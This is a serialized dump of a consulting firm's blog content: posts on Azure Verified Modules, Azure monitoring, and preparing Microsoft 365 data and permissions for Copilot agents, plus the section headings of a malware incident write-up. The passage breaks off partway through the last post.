Protection",{"menuItems":20601},[20602,20604,20607,20610,20613,20616,20619,20622,20625,20628,20631,20634,20637,20640,20643,20646],{"href":20603,"text":8258},"#prologue",{"href":20605,"text":20606},"#_1-initial-event-and-triage-summary","Initial Event and Triage Summary",{"href":20608,"text":20609},"#_2-malware-architecture-and-execution-chain-overview","Malware Architecture and Execution Chain Overview",{"href":20611,"text":20612},"#_3-deep-dive-updaterexe","Deep Dive: Updater.exe",{"href":20614,"text":20615},"#_4-deep-dive-powbat","Deep Dive: pow.bat",{"href":20617,"text":20618},"#_5-deep-dive-mainexe-electron-based-malware-loader","Deep Dive: main.exe",{"href":20620,"text":20621},"#_6-deep-dive-inputjs-the-encrypted-javascript-payload-loader","Deep Dive: input.js",{"href":20623,"text":20624},"#_7-deepdive-akira-stealer-v2-astorpy","DeepDive: Akira Stealer v2",{"href":20626,"text":20627},"#_8-circular-execution-chain-a-self-healing-loop","Circular Execution Chain",{"href":20629,"text":20630},"#_9-blockchain-tracking-and-analysis","Blockchain Tracking and Analysis",{"href":20632,"text":20633},"#_10-inside-the-akira-ecosystem-commercialized-cybercrime-infrastructure","Inside the Akira Ecosystem",{"href":20635,"text":20636},"#_11-akira-stealer-quickcheck-affected-files","Akira Stealer QuickCheck affected files",{"href":20638,"text":20639},"#_12-beyond-response-how-glueckkanja-csoc-turns-incidents-into-insights","How glueckkanja CSOC Turns Incidents into Insights",{"href":20641,"text":20642},"#_13-indicators-of-compromise-iocs","Indicators of Compromise (IOCs)",{"href":20644,"text":20645},"#_14-reflecting-on-the-akira-stealer-incident-strengthening-your-defense-with-glueckkanja-csoc","Reflecting on the Akira Stealer Incident",{"href":20647,"text":20648},"#_15-security-legal-disclaimer-use-of-real-malware-code","Security & Legal Disclaimer",{"noMargin":2181},{"quote":2168,"infos":20651},{"bgColor":6344,"color":5865,"boxBgColor":6345,"boxColor":5863,"headline":5933,"subline":7756,"level":41,"textStyling":2204,"flush":2205,"person":20652,"form":20656},{"image":5936,"cloudinary":2181,"alt":5937,"name":5937,"detailsHeader":5269,"details":20653},[20654,20655],{"text":5272,"href":5273,"details":5873,"icon":5275},{"text":5277,"href":5278,"icon":5279},{"ctaText":5281,"cta":20657,"method":2169,"action":2216,"fields":20658},{"skin":2215},[20659,20660,20661,20662,20663,20664,20665],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":2236,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},{"type":2241,"id":2247,"value":7769},{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},[20667,20669],{"lang":2260,"href":20668},"/de/posts/2025-06-16-quiet-breach",{"lang":2263,"href":20670},"/es/posts/2025-06-16-quiet-breach","/posts/2025-06-16-quiet-breach",{"title":8251,"description":31},"posts/2025-06-16-quiet-breach",[20675,2269,2273,20676],"Microsoft 365 Defender","Incident Deep Dive","8tQEQ_kUSt_3ETplARXmvucSYVhgePzGqcIWlJx0yFI",{"id":20679,"title":20680,"author":20681,"body":20682,"cta":2166,"description":65,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":20848,"moment":2166,"navigation":2181,"path":20883,"seo":20884,"stem":20885,"tags":20886,"webcast":2168,"__hash__":20889},"content_en/posts/2025-07-22-azure-certified-modules.md","Next Level Azure IaC: Azure Verified Modules",[2510],{"type":9,"value":20683,"toc":20841},[20684,20688,20690,20698,20701,20712,20715,20718,20726,20730,20732,20735,20738,20752,20755,20758,20762,20764,20767,20771,20773,20776,20779,20782,20802,20805,20813,20816,20820],[41,20685,20687],{"id":20686},"azure-verified-modules-iac-according-to-microsoft-best-practices","Azure Verified Modules – IaC According to Microsoft Best Practices",[12,20689,31],{},[12,20691,20692,20693,20697],{},"Microsoft has taken on this challenge and created then ",[2672,20694,20696],{"href":20695},"https://azure.github.io/Azure-Verified-Modules","Azure Verified Modules (AVM)",", a framework for structured resource deployment in Azure based on best practices.",[12,20699,20700],{},"AVM comes in three different variants:",[1254,20702,20703,20706,20709],{},[1257,20704,20705],{},"Resource Modules – Deployment of a defined cloud resource",[1257,20707,20708],{},"Pattern Modules – Deployment of a defined cloud workload",[1257,20710,20711],{},"Utility Modules – Helper modules used by Resource or Pattern Modules",[12,20713,20714],{},"To ensure consistency, Microsoft has set out a series of requirements that every new AVM resource must meet. These requirements apply to both Terraform and Microsoft Azure’s own IaC language, Bicep.",[12,20716,20717],{},"Each AVM is assigned to a specific Microsoft employee who is responsible for its creation, ongoing development and handling issues.",[12,20719,20720,20721,20725],{},"All available modules are open source (MIT license) and accessible in public GitHub repositories under the general ",[2672,20722,20724],{"href":20723},"https://github.com/Azure","Azure GitHub organization",". If a module causes issues or lacks a required parameter, anyone can file an issue or contribute to its development.",[41,20727,20729],{"id":20728},"how-do-you-get-started-with-avm","How Do You Get Started with AVM?",[12,20731,31],{},[12,20733,20734],{},"AVM works just like any other module in Terraform or Bicep; they are called independently and receive all required parameters. The AVM guidelines ensure that the number of required parameters is minimised to provide an easy entry point.",[12,20736,20737],{},"Example with Terraform:\nTo deploy a virtual machine with an additional data disk, you would typically need at least the following Azure resources:",[1254,20739,20740,20743,20746,20749],{},[1257,20741,20742],{},"azurerm_windows_virtual_machine oder azurerm_linux_virtual_machine",[1257,20744,20745],{},"azurerm_network_interface",[1257,20747,20748],{},"azurerm_managed_disk",[1257,20750,20751],{},"azurerm_virtual_machine_data_disk_attachment\u003C",[12,20753,20754],{},"Each of these resources has mandatory parameters that often repeat, such as the resource group name, target region, or resource naming conventions.",[12,20756,20757],{},"With AVM, this is simplified in your code to a single resource containing the necessary parameters, which are then processed further within the module. AVM incorporates Microsoft's most common best practices, so many parameters have default values, eliminating the need for additional configuration steps. For example, many modules enforce TLS 1.2 as the default setting or block public access by default.",[41,20759,20761],{"id":20760},"what-if-theres-no-avm-for-my-resource-yet","What If There’s No AVM for My Resource Yet?",[12,20763,31],{},[12,20765,20766],{},"Thanks to AVM’s open-source license, you can use the framework to begin your own development. If a Microsoft employee later decides to create an official AVM resource, your prior work can contribute to the open-source effort.",[41,20768,20770],{"id":20769},"gkvm-glueckkanja-️-open-source","GKVM – glueckkanja ❤️ Open Source",[12,20772,31],{},[12,20774,20775],{},"At glueckkanja, we follow exactly this approach and also support our customers in developing modules based on the AVM framework that are later made publicly available.",[12,20777,20778],{},"We call these modules GKVM (GlueckKanja Verified Modules), because they not only follow AVM requirements but also include our own insights from numerous projects.",[12,20780,20781],{},"GKVM Resource Modules:",[1254,20783,20784,20790,20796],{},[1257,20785,20786],{},[2672,20787,20789],{"href":20788},"https://registry.terraform.io/modules/glueckkanja/gkvm-res-synapse-workspace/azurerm/latest","Azure Synapse Workspace",[1257,20791,20792],{},[2672,20793,20795],{"href":20794},"https://registry.terraform.io/modules/glueckkanja/gkvm-res-iot-hub/azurerm/latest","Azure IoT Hub",[1257,20797,20798],{},[2672,20799,20801],{"href":20800},"https://registry.terraform.io/modules/glueckkanja/gkvm-res-messaging-eventgridsystemtopic/azurerm/latest","Azure Event Grid System Topic",[12,20803,20804],{},"GKVM Pattern Modules:",[1254,20806,20807],{},[1257,20808,20809],{},[2672,20810,20812],{"href":20811},"https://registry.terraform.io/modules/glueckkanja/gkvm-ptn-myworkid/azurerm/latest","My WorkId",[12,20814,20815],{},"Feel free have a look and provide issues, which will enhance the modules even furthermore!",[41,20817,20819],{"id":20818},"further-resources","Further Resources",[1254,20821,20822,20828,20834],{},[1257,20823,20824],{},[2672,20825,20827],{"href":20826},"/en/azure/azure-foundation","glueckkanja Azure Foundation",[1257,20829,20830],{},[2672,20831,20833],{"href":20832},"/en/posts/2023-04-14-workload-management-with-azure-foundation","Azure Foundation: Efficient Cloud Management with Terraform",[1257,20835,20836],{},[2672,20837,20840],{"href":20838,"rel":20839},"https://www.terraprovider.com/",[2676],"Terraform Provider for Microsoft 365",{"title":65,"searchDepth":111,"depth":111,"links":20842},[20843,20844,20845,20846,20847],{"id":20686,"depth":111,"text":20687},{"id":20728,"depth":111,"text":20729},{"id":20760,"depth":111,"text":20761},{"id":20769,"depth":111,"text":20770},{"id":20818,"depth":111,"text":20819},{"lang":2171,"seoTitle":20849,"titleClass":2173,"date":20850,"categories":20851,"blogtitlepic":20852,"socialimg":20853,"customExcerpt":20854,"keywords":20855,"contactInContent":20856,"hreflang":20876,"footer":20881,"scripts":20882},"Azure Verified Modules: Standardized Infrastructure as Code with Terraform & Bicep","2025-07-22",[4232],"head-azure-certified.png","/blog/heads/head-azure-certified.png","Infrastructure-as-Code (IaC), especially with Terraform, is a key component of our Azure Foundation and a fundamental element of every cloud transformation. A structured use of IaC accelerates the adoption of cloud services as well as the development of new products. But how do you get started in the best way?","Azure Verified Modules, AVM, Infrastructure as Code, IaC, Terraform, Bicep, Microsoft Best Practices, Azure Module Deployment, Azure Foundation, Open Source Azure, Azure IaC, Azure Automation, automated deployment of Azure resources",{"quote":2168,"infos":20857},{"bgColor":2201,"color":5865,"boxBgColor":5864,"boxColor":5865,"headline":5933,"subline":20858,"level":41,"textStyling":2204,"flush":2205,"person":20859,"form":20864},"Would you like to learn more about Infrastructure as Code on Azure? We are happy to show you how to work faster, more standardized, and more sustainably in the cloud with Azure Verified Modules. Whether you are just getting started or looking for scalable implementation, we support you with experience and best practices. We look forward to hearing from you!",{"image":5936,"cloudinary":2181,"alt":5937,"name":5937,"detailsHeader":20860,"details":20861},"We look forward to\u003Cbr />hearing from you!",[20862,20863],{"text":5272,"href":5273,"details":5274,"icon":5275},{"text":5266,"href":6190,"icon":5279},{"ctaText":2213,"cta":20865,"method":2169,"action":2216,"fields":20866},{"skin":2215},[20867,20868,20869,20870,20872,20874,20875],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":20871,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},"Your data will be stored with us for processing and responding to your inquiry. For more information on data protection, please see our \u003Ca href=\"/en/privacy\">privacy policy\u003C/a>.",{"type":2241,"id":2247,"value":20873},"Form: Blog Azure Verified Modules | EN",{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},[20877,20879],{"lang":2260,"href":20878},"/de/posts/2025-07-22-azure-certified-modules",{"lang":2263,"href":20880},"/es/posts/2025-07-22-azure-certified-modules",{"noMargin":2181},{"slick":2181},"/posts/2025-07-22-azure-certified-modules",{"title":20680,"description":65},"posts/2025-07-22-azure-certified-modules",[20887,20888,4244,7005],"Infrastructure as Code","Azure Verified Modules","CNBeZ8zongS7Td5L7fUlvsQRGIkTzrzG-Tl_ZAu3jk8",{"id":20891,"title":20892,"author":20893,"body":20894,"cta":2166,"description":65,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":20994,"moment":2166,"navigation":2181,"path":21025,"seo":21026,"stem":21027,"tags":21028,"webcast":2168,"__hash__":21029},"content_en/posts/2025-08-27-azure-monitor.md","Monitoring That Grows With You – Organic Solutions in Azure",[2544],{"type":9,"value":20895,"toc":20986},[20896,20900,20902,20905,20909,20911,20914,20931,20934,20938,20940,20943,20946,20949,20953,20955,20958,20961,20965,20967,20970,20973,20976,20979,20981,20983],[41,20897,20899],{"id":20898},"monitoring-in-azure","Monitoring in Azure",[12,20901,31],{},[12,20903,20904],{},"Monitoring in the cloud is much more than just collecting metrics. In dynamic Azure environments, it’s about capturing relevant information in a targeted way, visualizing it meaningfully, and responding automatically. The focus is not only on technical aspects, but also on scalability, cost control, and governance.",[41,20906,20908],{"id":20907},"holistic-monitoring-with-azure-more-than-just-metrics","Holistic Monitoring with Azure – More Than Just Metrics",[12,20910,31],{},[12,20912,20913],{},"A modern monitoring concept in Azure includes various components:",[1254,20915,20916,20919,20922,20925,20928],{},[1257,20917,20918],{},"Azure Monitor as the central platform for metrics, logs, and alerts",[1257,20920,20921],{},"Log Analytics for in-depth analysis and correlation",[1257,20923,20924],{},"Application Insights for application monitoring",[1257,20926,20927],{},"Workbooks and dashboards for visualization",[1257,20929,20930],{},"Action Groups and Logic Apps for automated responses",[12,20932,20933],{},"Monitoring becomes especially valuable when it covers not only cloud-native resources but also hybrid scenarios. With Azure Arc, on-premises systems and other clouds can be seamlessly integrated—including logging, alerting, and policy enforcement. This creates a consistent view across the entire infrastructure.",[41,20935,20937],{"id":20936},"keeping-track-of-changes-and-inventory-change-tracking-inventory","Keeping Track of Changes and Inventory – Change Tracking & Inventory",[12,20939,31],{},[12,20941,20942],{},"An often underestimated aspect of monitoring is tracking changes to resources. With Azure Change Tracking, configuration changes to VMs, files, registry entries, and software installations can be automatically recorded and historically analyzed. This is particularly helpful for root cause analysis of incidents or for meeting compliance requirements.",[12,20944,20945],{},"This is complemented by the Inventory function, which provides a complete overview of installed software, running services, and system configurations—for both Azure VMs and on-premises systems integrated via Azure Arc. This creates a central view of the technical state of the environment, which can be seamlessly integrated into existing monitoring and governance structures.",[12,20947,20948],{},"Combined with Log Analytics and automated alerts, Change Tracking becomes a powerful tool for transparent operations, rapid error analysis, and compliant documentation.",[41,20950,20952],{"id":20951},"cost-control-through-targeted-logging","Cost Control Through Targeted Logging",[12,20954,31],{},[12,20956,20957],{},"A common stumbling block in monitoring is cost development due to uncontrolled logging. Azure offers various pricing tiers with Log Analytics, making long-term retention cost-effective. By selecting appropriate retention periods and sampling strategies, costs can be significantly reduced without sacrificing important information.",[12,20959,20960],{},"A structured approach helps to design logging in a targeted and efficient way. Azure Policy plays a key role here: with predefined policies, diagnostic settings can be automatically applied to new resources. This ensures consistency and significantly reduces manual effort.",[41,20962,20964],{"id":20963},"monitoring-in-managed-service","Monitoring in Managed Service",[12,20966,31],{},[12,20968,20969],{},"Effective monitoring starts with a stable and structured foundation. In Azure environments, a landing zone provides the necessary basis to implement governance, security, and operations consistently. This foundation includes not only network infrastructure and identity management, but also a well-thought-out monitoring framework.",[12,20971,20972],{},"Our Azure Foundation demonstrates how this can work: it brings a set of proven alerts, logging configurations, and Azure Policy controls that ensure new resources are automatically configured with the right settings. This creates an environment where transparency and operational security are considered from the outset.",[12,20974,20975],{},"On top of this, app zones can be provided for specific applications. These zones are flexible and can be integrated into existing monitoring with tailored alerts and automated logging. This keeps the environment scalable and allows it to grow with requirements—without losing visibility or standardization.",[12,20977,20978],{},"This structure ensures that monitoring is not only technically sound but also strategically scalable. Standards provide consistency, while modularity allows for individual requirements. A managed service can support you by taking over operations, maintenance, and further development. This creates freedom to focus on what really matters—your core business, product development, or business process optimization.",[41,20980,4287],{"id":4286},[12,20982,31],{},[12,20984,20985],{},"Modern monitoring in Azure is a key building block for stable and secure cloud operations. Those who focus early on standardization, automation, and cost control lay the foundation for transparency, efficiency, and sustainable growth.",{"title":65,"searchDepth":111,"depth":111,"links":20987},[20988,20989,20990,20991,20992,20993],{"id":20898,"depth":111,"text":20899},{"id":20907,"depth":111,"text":20908},{"id":20936,"depth":111,"text":20937},{"id":20951,"depth":111,"text":20952},{"id":20963,"depth":111,"text":20964},{"id":4286,"depth":111,"text":4287},{"lang":2171,"seoTitle":20892,"titleClass":2173,"date":20995,"categories":20996,"blogtitlepic":20997,"socialimg":20998,"customExcerpt":20999,"keywords":21000,"contactInContent":21001,"hreflang":21018,"footer":21023,"scripts":21024},"2025-08-27",[4232],"head-azure-monitor.png","/blog/heads/head-azure-monitor.png","How modern Azure monitoring creates transparency and leaves room for what matters most","Azure Monitor, Microsoft Best Practices, Azure, Azure Foundation",{"quote":2168,"infos":21002},{"bgColor":2201,"color":5865,"boxBgColor":5864,"boxColor":5865,"headline":5933,"subline":21003,"level":41,"textStyling":2204,"flush":2205,"person":21004,"form":21008},"Would you like to learn more about Azure? We are happy to show you how to work faster, more standardized, and more sustainably in the cloud with Azure Verified Modules. Whether you are just getting started or looking for scalable implementation, we support you with experience and best practices. We look forward to hearing from you!",{"image":5936,"cloudinary":2181,"alt":5937,"name":5937,"detailsHeader":20860,"details":21005},[21006,21007],{"text":5272,"href":5273,"details":5274,"icon":5275},{"text":5266,"href":6190,"icon":5279},{"ctaText":2213,"cta":21009,"method":2169,"action":2216,"fields":21010},{"skin":2215},[21011,21012,21013,21014,21015,21016,21017],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":20871,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},{"type":2241,"id":2247,"value":20873},{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},[21019,21021],{"lang":2260,"href":21020},"/de/posts/2025-08-27-azure-monitor",{"lang":2263,"href":21022},"/es/posts/2025-08-27-azure-monitor",{"noMargin":2181},{"slick":2181},"/posts/2025-08-27-azure-monitor",{"title":20892,"description":65},"posts/2025-08-27-azure-monitor",[20888,4244,7005],"jZjkRgC7YnVKsEAl9GAuvfQrKsINLjJFSFEIhTTPzFc",{"id":21031,"title":21032,"author":21033,"body":21034,"cta":2166,"description":65,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":21712,"moment":2166,"navigation":2181,"path":21784,"seo":21785,"stem":21786,"tags":21787,"webcast":2168,"__hash__":21792},"content_en/posts/2025-08-28-agent-ready-infrastructure copy.md","This is why you need a solid infrastructure to be agent-ready in 2025",[2525],{"type":9,"value":21035,"toc":21674},[21036,21038,21040,21046,21053,21057,21059,21062,21065,21070,21080,21087,21092,21101,21111,21124,21128,21130,21133,21137,21139,21142,21146,21148,21155,21159,21161,21172,21179,21181,21184,21204,21208,21210,21213,21217,21219,21226,21230,21232,21235,21239,21241,21252,21256,21258,21261,21265,21267,21270,21274,21288,21291,21294,21298,21300,21304,21306,21313,21316,21324,21332,21336,21338,21341,21347,21350,21355,21360,21364,21366,21373,21377,21379,21386,21394,21398,21400,21403,21406,21410,21412,21415,21418,21425,21429,21431,21434,21437,21442,21445,21448,21452,21454,21460,21463,21469,21472,21477,21481,21483,21542,21546,21548,21570,21574,21576,21579,21583,21585,21588,21592,21594,21601,21605,21607,21618,21625,21630,21633,21637,21639,21645,21652,21656,21659,21662,21666,21668,21671],[41,21037,8258],{"id":8257},[12,21039,31],{},[12,21041,21042,21043,1013],{},"With this omnipresence, many ideas and the desire to take action or at least experiment arise. At glueckkanja AG, we support our customers throughout this process. Of course, we are already developing and building agents, but in 80% of our projects, the primary focus is on preparing the data and tenant for agent creation. Before you implement Copilot productively in your organization, it's worthwhile to take a critical look at your infrastructure. When making decisions in this area, there are several important aspects to understand before deploying AI agents on a large scale. That’s why, in this blog post, I will guide you through the essential steps and differences. In a time when AI assistants like Microsoft 365 Copilot Agents promise to transform the working world, one principle holds true above all: ",[3456,21044,21045],{},"AI is only as good as the system beneath it",[12,21047,21048,21049,21052],{},"This comprehensive guide outlines ",[251,21050,21051],{},"how to prepare your data and infrastructure"," for Copilot Agents, covering key practices in SharePoint, Teams, and the Power Platform.",[41,21054,21056],{"id":21055},"why-your-infrastructure-data-matters","Why your infrastructure (data) matters",[12,21058,31],{},[12,21060,21061],{},"As we utilize AI agents, it is imperative to understand that these agents do not inherently possess knowledge about our organization, our data, or our unique operational context. By default, an AI agent only carries the built-in knowledge derived from the training of the Large Language Model (LLM). To effectively enhance and extend the capabilities of these AI agents, it is essential to systematically integrate various components. This enhancement can be achieved through the implementation of System Prompts, Knowledge Bases, Connectors, Web-Search functionalities, access to Microsoft Graph, Semantic Search, and additional tools. These components collectively enable the AI agents to deliver more precise, contextually relevant responses and actions, aligning closely with the specific needs and data of the organization. Since we are now in the very beginning of the agentic area, many of us will start with simple agents that source information based on existing SharePoint Online libraries.",[12,21063,21064],{},"For us in IT, that means we need to take care about our data in SharePoint Online more than ever!",[2110,21066,21067],{},[12,21068,21069],{},"SharePoint Online = Knowledge = Data and Data = Key",[12,21071,21072,21075,21076,21079],{},[251,21073,21074],{},"My clear message:"," Before adding AI copilots to your organization, ",[251,21077,21078],{},"get your data house in order",". The same data that feeds your Copilot Agents also feeds Microsoft 365 Copilot itself.",[12,21081,21082,21083,21086],{},"And not only that! Microsoft 365 Copilot is assessing the same data. *If that data is cluttered, overshared, or poorly secured, the AI could surface incorrect or sensitive information unexpectedly *or example, imagine asking Copilot about company structure and receiving details of a confidential reorganization plan you weren’t meant to see. Such incidents occur when content is ",[251,21084,21085],{},"overshared"," (available too broadly) on platforms like SharePoint or Teams. Note: Copilot respects all existing permissions, that means something like only can happen when permissions are misconfigured. Conversely, if data is siloed or inaccessible, AI assistants will be less useful.",[2110,21088,21089],{},[12,21090,21091],{},"Copilot only surfaces organizational data that the individual user has at least view permissions for!",[12,21093,21094,540,21097],{},[251,21095,21096],{},"Source:",[2672,21098,21099],{"href":21099,"rel":21100},"https://learn.microsoft.com/en-gb/copilot/microsoft-365/microsoft-365-copilot-privacy?azure-portal=true",[2676],[12,21102,21103,21106,21107,21110],{},[251,21104,21105],{},"Key takeaway:"," Enterprise AI succeeds only with a solid data foundation. A recent Microsoft report identifies ",[251,21108,21109],{},"data oversharing, data leakage, and noncompliant usage"," as top challenges to address before deploying AI. Organizations that invest in preparation of SharePoint Online and other data sources, will unlock Copilot’s benefits with confidence, while those who don’t risk security breaches or irrelevant AI outputs. Studies show about one-third of decision-makers lack full visibility into critical data.",[5137,21112,420,21113,420,21116,420,21118,420,21121],{},[5140,21114],{"media":5142,"srcSet":21115},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/data-security-report-statistics.png",[5140,21117],{"media":5146,"srcSet":21115},[5140,21119],{"media":5150,"srcSet":21120},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/data-security-report-statistics-mob.png",[2642,21122],{"src":21120,"alt":21123},"Two statistics on data risks: 30% of decision-makers lack visibility into business-critical data (Visibility Gap) and 87% of security leaders reported a data breach in the past year (Data Breach Prevalence).",[41,21125,21127],{"id":21126},"_10-steps-to-improve-your-m365-data-infrastructure-now","10 steps to improve your M365 data infrastructure now",[12,21129,31],{},[12,21131,21132],{},"Now we know your agents will need data. As we as glueckkanja step in these projects, this is our typical 10-point list that we work from the top to end with our customers.",[186,21134,21136],{"id":21135},"step-1-check-core-sharing-settings","Step 1: Check Core Sharing Settings",[12,21138,47],{},[12,21140,21141],{},"Verify tenant-wide settings that could lead to oversharing. For example, scrutinize default link sharing policies (e.g. if “Anyone with the link” or “People in your organization” is allowed by default for SharePoint/OneDrive), whether users can create public Teams by default, and if your Power Platform environment is open without governance. Misconfigured defaults here are a common cause of unintentional broad access..",[186,21143,21145],{"id":21144},"step-2-audit-public-teams","Step 2: Audit Public Teams",[12,21147,47],{},[12,21149,21150,21151,21154],{},"Review any Microsoft Teams marked as “Public.” A public Team means ",[3456,21152,21153],{},"anyone in your organization"," can discover and access its content. Ensure that any Team set to public truly contains only non-sensitive, broadly suitable content. If not, switch it to private or adjust membership. (It’s easy for a Team to be created as Public and later forgotten, exposing files to all employees.)",[186,21156,21158],{"id":21157},"step-3-review-graph-connectors","Step 3: Review Graph Connectors",[12,21160,47],{},[12,21162,21163,21164,21167,21168,21171],{},"Check if your tenant has any ",[3456,21165,21166],{},"Microsoft Graph Connectors"," set up that pull in third-party data (e.g. from external file systems, wikis, etc.). Remove or secure any connector that indexes data not everyone should see. ",[251,21169,21170],{},"Why?"," Content indexed via Graph Connectors becomes part of your Microsoft Graph search index – meaning Copilot can potentially use it to answer prompts. You only want relevant, intended data sources connected.",[186,21173,21175,21176],{"id":21174},"step-4-generate-a-sharepoint-online-baseline-report","Step 4: Generate a ",[251,21177,21178],{},"SharePoint Online Baseline Report",[12,21180,47],{},[12,21182,21183],{},"SPO has different possible risks for unwanted data in Agents and Copilot. You need to look for different key metrics:",[1254,21185,21186,21189,21192,21195,21198,21201],{},[1257,21187,21188],{},"Broken Permission Inheritance on a folder-level",[1257,21190,21191],{},"Public SharePoint Sites",[1257,21193,21194],{},"Use of \"Everyone Except External Users\" or other dynamic group that contain all users",[1257,21196,21197],{},"Anyone Sharing Links",[1257,21199,21200],{},"Everyone-in-my-org Sharing Links",[1257,21202,21203],{},"Unwanted people in the Site Admins / Owners / Members / Visitors Group",[186,21205,21207],{"id":21206},"step-5-categorize-and-prioritize-risks","Step 5: Categorize and Prioritize Risks",[12,21209,47],{},[12,21211,21212],{},"Take the findings from Steps 1–4 and rank them by severity. Which sites or files carry the most business-critical or sensitive data and also have exposure risks? Prioritize fixing those. By layering business context (e.g., a site with financial data vs. a site with generic templates), you can focus on the most impactful issues first.",[186,21214,21216],{"id":21215},"step-6-involve-site-owners-for-access-reviews","Step 6: Involve Site Owners for Access Reviews",[12,21218,47],{},[12,21220,21221,21222,21225],{},"For each SharePoint site (or Team) highlighted as risky, have the site owner double-check who has access and if that is appropriate. Owners are typically closest to the content and can quickly spot “Oh, why does ",[3456,21223,21224],{},"Everyone"," have read access to this? That shouldn’t be.” Implement a process where site admins certify permissions regularly.",[186,21227,21229],{"id":21228},"step-7-establish-ongoing-oversight","Step 7: Establish Ongoing Oversight",[12,21231,47],{},[12,21233,21234],{},"Put in place a continuous monitoring process for new oversharing issues. Oversharing control isn’t a one-time fix; as new sites, Teams, and files get created, you need to catch misconfigurations proactively. Consider using Microsoft Purview’s reports or alerts to catch things like files shared externally or to huge groups, new public teams created, etc. Microsoft’s tools can automate alerts for these conditions, so make use of them to maintain a strong posture.",[186,21236,21238],{"id":21237},"step-8-apply-sensitivity-labels-and-dlp-policies","Step 8: Apply Sensitivity Labels and DLP Policies",[12,21240,47],{},[12,21242,21243,21244,21247,21248,21251],{},"Use Microsoft Purview ",[251,21245,21246],{},"Sensitivity Labels"," to classify data (Confidential, Highly Confidential, etc.) and bind those labels to protection settings. For instance, a “Confidential” label can encrypt files or prevent external sharing. Also configure ",[251,21249,21250],{},"Data Loss Prevention (DLP)"," policies to prevent or monitor oversharing of sensitive info (like blocking someone from emailing a list of customer SSNs). These tools not only prevent accidental leaks in day-to-day use, they also work with Copilot: if Copilot tries to access or output labeled content in ways it shouldn’t, DLP can intervene. Moreover, Copilot itself will carry forward the document’s label to its responses, as noted later.",[186,21253,21255],{"id":21254},"step-9-implement-power-platform-governance","Step 9: Implement Power Platform Governance",[12,21257,47],{},[12,21259,21260],{},"Extend your oversight to the Power Platform (Power Apps, Power Automate, etc.). Define DLP policies for Power Platform to control connectors (so someone can’t, say, make a flow that pulls data from a sensitive SharePoint list and posts it to an external service). Also consider having multiple environments (Dev/Test/Prod) with proper security so that “Citizen Developers” building agents or apps don’t inadvertently expose data. Essentially, prevent the Power Platform from becoming an ungoverned backdoor to your data.",[186,21262,21264],{"id":21263},"step-10-educate-and-enable-your-agent-builders","Step 10: Educate and Enable Your Agent Builders",[12,21266,47],{},[12,21268,21269],{},"Finally, create guidelines and best practices for those who will be building or deploying AI agents (whether they are pro developers or business users). Establish training on handling data safely: e.g., how to choose appropriate knowledge sources for an agent, why not to include sensitive files in a broadly shared agent, how to test an agent’s output for any unexpected info. By fostering a data-aware culture among “agent makers,” you reduce the chance of someone inadvertently exposing information when designing an AI solution.",[12,21271,21272],{},[251,21273,4127],{},[1254,21275,21276,21282],{},[1257,21277,21278],{},[2672,21279,21280],{"href":21280,"rel":21281},"https://techcommunity.microsoft.com/blog/microsoft365copilotblog/from-oversharing-to-optimization-deploying-microsoft-365-copilot-with-confidence/4357963",[2676],[1257,21283,21284],{},[2672,21285,21286],{"href":21286,"rel":21287},"https://techcommunity.microsoft.com/blog/microsoft365copilotblog/microsoft-graph-connectors-update-expand-copilot%E2%80%99s-knowledge-with-50-million-ite/4243648",[2676],[12,21289,21290],{},"After you have completed these steps, you can now securely go on and start building productive agents. To build agents, we have different platforms and features from Microsoft that we can rely on for. You'll find the most prominent examples in the next chapter. If you need help with this list, feel free to reach out to us so we can help you with this important preparation exercise.",[12,21292,21293],{},"Nothing prevents you in the meanwhile to create PoC or Test-Agents with sample data, manually uploaded files or specific data attached via RAG. But we recommend these steps before a larger implementation / rollout of agents.",[41,21295,21297],{"id":21296},"understanding-differences-between-agent-platforms","Understanding differences between Agent Platforms",[12,21299,31],{},[186,21301,21303],{"id":21302},"step-1-understand-your-agent-creators","Step 1: Understand your Agent-Creators",[12,21305,47],{},[12,21307,21308,21309,21312],{},"After the foundation work to prepare the data, we need to understand which platforms are available to create those agents. We try to differentiate these tools by features and possibilities, but it's important to notice that creating agents and choosing the right tolling is a range. There are multiple ways to build AI agents in the Microsoft ecosystem. It’s important to pick the right one for your needs and your team’s skill level. It also clarifies when to leverage ",[251,21310,21311],{},"Azure AI Foundry"," versus built-in Copilot Studio tools.",[12,21314,21315],{},"Microsoft offers a set of different tools that can build agents by today. While they seem like each other, they are built for different target audiences and levels of expertise. Take a closer look at the overview below. Understanding who needs to create and maintain these agents, also shows us, which Knowledge sources (= data) we need to prepare for our Agents. Beside the tools in the list below, there are even more pro-code solutions to build agents like M365 Agents Toolkit, Visual Studio Code, Agent SDK and more.  All our data preparation  steps´ apply for them as well, since they access the same data like other agents do.",[12,21317,21318,540,21320],{},[251,21319,21096],{},[2672,21321,21322],{"href":21322,"rel":21323},"https://www.egroup-us.com/news/microsoft-copilot-ai-integration/",[2676],[5137,21325,420,21326,420,21329],{},[5140,21327],{"media":5142,"srcSet":21328},"https://res.cloudinary.com/c4a8/image/upload/v1756363984/blog/pics/table-copilot-ai-integration.png",[2642,21330],{"src":21328,"alt":21331},"Comparison of three Copilot solution categories: Pre-Built (ootb), Makers, and Developers.",[186,21333,21335],{"id":21334},"step-2-identify-use-cases-and-requirements-for-your-platform","Step 2: Identify Use Cases and requirements for your 